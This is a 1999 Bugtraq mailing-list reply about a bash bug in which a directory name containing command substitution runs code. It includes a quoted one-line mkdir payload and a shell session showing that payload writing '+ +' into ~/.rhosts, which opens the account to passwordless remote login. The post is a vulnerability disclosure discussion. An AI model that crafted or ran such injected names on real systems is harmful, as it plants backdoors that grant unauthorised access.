[10324] in bugtraq
Re: Bash Bug
daemon@ATHENA.MIT.EDU (Guy Cohen)
Thu Apr 22 17:40:47 1999
Date: Fri, 23 Apr 1999 00:02:57 +0300
Reply-To: Guy Cohen <guy@SPICE.ORG.IL>
From: Guy Cohen <guy@SPICE.ORG.IL>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <371e6fd4.13342@crystal.dragonfire.net>; from Andy Church on Wed,
Apr 21, 1999 at 08:39:48PM -0400
At this (Wed, Apr 21, 1999 at 08:39:48PM -0400) day, Andy Church wrote:
.| >If a user creates a directory with a command like
.| >
.| >mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
.| >
.| Just to clarify, this only happens if PS1 (the bash prompt) contains
.| \w or \W _and_ a prompt is displayed containing the bogus directory name.
.| This means unattended shell scripts are safe. As a workaround, use `pwd`
.| in place of \w.
.|
Unfortunately this is not true. here is why:
rush:/tmp> bash --version
GNU bash, version 2.03.0(1)-release (i586-pc-linux-gnu)
Copyright 1998 Free Software Foundation, Inc.
rush:/tmp> bash
bash-2.03$ echo $PS1
\s-\v\$
bash-2.03$ cat ~/.rhosts
cat: /export/home/guy/.rhosts: No such file or directory
bash-2.03$ mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
bash-2.03$ cd \\\ \ /
bash-2.03$ cat /export/home/guy/.rhosts\
+ +
sh-2.03$
--
Guy Cohen <guy@spice.org.il>
